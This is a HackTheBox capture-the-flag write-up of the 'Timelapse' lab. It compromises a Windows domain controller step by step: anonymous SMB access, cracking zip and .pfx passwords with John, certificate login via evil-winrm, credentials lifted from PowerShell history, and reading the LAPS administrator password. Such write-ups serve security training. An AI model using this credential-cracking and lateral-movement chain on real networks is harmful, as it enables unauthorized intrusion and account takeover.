HackTheBox - Timelapse
Timelapse is a Windows Machine that involves accessing a publicly accessisble SMB share. Cracking a .zip file containing a .pfx file that can be used to authenticate to a DC. Upon establshing a foothold we hunt for credentials and utilize a Domain Group to obtain a Password via LAPS and thus gain administrative access on the Domain Controller.
Enumeration
As always, we start off with a nmap scan.
└─$ sudo nmap -sC -A 10.129.227.105 -oA Evidence/Scans/1k
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 19:31 CEST
Nmap scan report for 10.129.227.105
Host is up (0.031s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-06 01:31:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h59m57s
| smb2-time:
| date: 2022-09-06T01:32:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 28.23 ms 10.10.14.1
2 28.33 ms 10.129.227.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.39 seconds
From the scan, we can see that we are dealing with a Domain Controller. It's worth noting down the domain: timelapse.htb.
Let's enumerate the services and start off with SMB.
$ smbclient -N -L //10.129.227.105
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.105 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ smbclient //10.129.227.105/Shares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
6367231 blocks of size 4096. 1286478 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
6367231 blocks of size 4096. 1286478 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \Dev\> exit
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
password incorrect--reenter:
Looking at the output above, we can see that anonymous access is enabled and we obtain winrm_backup.zip. We can't extract it yet, since it's password protected. However, we can try cracking it using john.
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ zip2john winrm_backup.zip > zip.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john zip.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john zip.john --wordlist=/usr/share/wordlists/rockyou.txt --show
Invalid options combination: "--show"
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john zip.john --show
winrm_backup.zip/legacyy_dev_auth.pfx:<REDACTED>:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip
1 password hash cracked, 0 left
We successfully obtain the password. The archive contains a .pfx file.
According to this post, a .pfx file, which is in a PKCS#12 format, contains the SSL certificate (public keys) and the corresponding private keys.
Running strings on the .pfx file, we can see that this is probably used to authenticate to a domain, for the user legacyy.
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ strings legacyy_dev_auth.pfx
_ Er
C(!,
4bz'
`o<l
|Y4W
I0{Q
L(vqQ#
{q[l"8
`+$DOC
hK*y
;5UERr
X!+3
&JCy
$-1f
NAM'u
"-r$$
Legacyy0
211025140552Z
311025141552Z0
Legacyy0
r"*J0:
cZK3
".G,
x0v0
legacyy@timelapse.htb0
}J5~f
t{(lz
5&8H
&4<6
kj@1
uUh2s
However, trying to extract the corresponding certificate doesn't work. The file is password protected. We can use the previously obtained password from the .zip archive, but no luck.
Using pfx2john we can obtain the hash and try to crack it again.
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ pfx2john legacyy_dev_auth.pfx > pfx.john
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john pfx.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
No password hashes left to crack (see FAQ)
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ john pfx.john --show
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx
1 password hash cracked, 0 left
Perfect, we got the password. Time to extract the SSL certificate (public keys) and the corresponding private key.
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
Enter Import Password:
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
Enter Import Password:
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ ls
Admin cert.pem Deliverables Evidence key.pem legacyy_dev_auth.pfx pfx.john Retest winrm_backup.zip zip.john
Let's see if we can authenticate to the DC now.
Lateral Movement
┌──(kali㉿kali)-[~/Documents/htb/timelapse]
└─$ evil-winrm -i 10.129.227.105 -u legacyy -c cert.pem -k key.pem -S
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>
This works, we are in. We can probably grab the first flag.
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/5/2022 6:30 PM 34 user.txt
Now we have multiple options, we can go straight into Bloodhound, we could automate enumeration using e.g. Winpeas or we could do some manual enumeration.
A good first thing to check is the PowerShell history. Let's start with that:
Looks like we obtain credentials for the account svc_deploy. This might be a service account used for deployment. Serviceaccounts can be high value targets.
A quick check with crackmapexec verifies that the credentials work.
Let's see if we can login via that account:
Privilege Escalation
Next, we should check what kind of privileges this account has:
The account is part of the LAPS Readers Group. LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset. The password then can be read from Active Directory by users who are allowed to do so. Eligible users can request a password change for a computer.
If we are eligible to read it, we might be able to obtain Administrator credentials and login.
Using the following query we can check if we can successfully read it:
Success, we obtained the cleartext password for the local administrator account. We should be able to login with those credentials:
Note: It's not necessary to pixelate the password above. LAPS randomly generates passwords that are then automatically changed on managed machines.
That's it. We have successfully gained administrative access on the DC and can grab the root flag.